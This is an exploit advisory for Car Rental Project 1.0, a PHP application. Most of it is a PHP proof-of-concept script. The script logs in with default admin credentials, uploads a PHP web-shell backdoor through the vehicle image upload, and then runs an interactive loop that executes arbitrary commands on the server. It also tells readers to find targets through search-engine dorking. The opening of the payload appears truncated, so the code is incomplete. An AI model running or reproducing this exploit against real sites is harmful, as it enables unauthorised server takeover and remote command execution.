============================================================================================================================================= | # Title : Car Rental Project 1.0 php code injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) | | # Vendor : https://phpgurukul.com/car-rental-project-php-mysql-free-download/ | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This PHP code is designed to create a file and inject PHP code. [+] save payload as poc.php [+] usage : C:\www\test>php poc.php 127.0.0.1 [+] payload : 'admin', 'password' => 'Test@12345', 'login' => '' ]; // Initiating a cURL request for login curl_setopt($session, CURLOPT_URL, $post_auth_login); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_POSTFIELDS, http_build_query($post_data)); curl_setopt($session, CURLOPT_COOKIEFILE, "cookie.txt"); // Store cookies in a file $login_response = curl_exec($session); // Get the HTTP response code $http_code = curl_getinfo($session, CURLINFO_HTTP_CODE); if ($http_code == 200) { echo "[+] Login HTTP response code: 200\n"; echo "[+] Successfully logged in\n"; } else { echo "[!] Failed to authenticate\n"; exit; } // Proxy settings (optional, for Burp) $proxies = [ "http" => "http://127.0.0.1:8080", "https" => "http://127.0.0.1:8080" ]; // Data for uploading the backdoor $backdoor_file = new CURLFile('1dccadfed7bcbb036c56a4afb97e906f.php', 'application/x-php', ''); $upload_data = [ 'img1' => $backdoor_file, 'update' => '' ]; // Attempt to upload the PHP shell curl_setopt($session, CURLOPT_URL, $shell_upload_url); curl_setopt($session, CURLOPT_POST, true); curl_setopt($session, CURLOPT_POSTFIELDS, $upload_data); $upload_response = curl_exec($session); if ($upload_response) { echo "[+] Backdoor upload at /carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php" . $bigstring; } else { echo "[!] Failed to upload backdoor\n"; exit; } // Command Execution Loop while (true) { echo "Command RCE >> "; $command = trim(fgets(STDIN)); $shell_location = "http://" . $rhosts . "/carrentalproject/carrental/admin/img/vehicleimages/1dccadfed7bcbb036c56a4afb97e906f.php?cmd=" . urlencode($command); // Execute the command curl_setopt($session, CURLOPT_URL, $shell_location); curl_setopt($session, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($session); echo $response . "\n"; } // Close cURL session curl_close($session); } if ($argc < 2) { echo "Usage: php script.php [target_host]\n"; exit; } // Call the login function with the provided host login($argv[1]); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================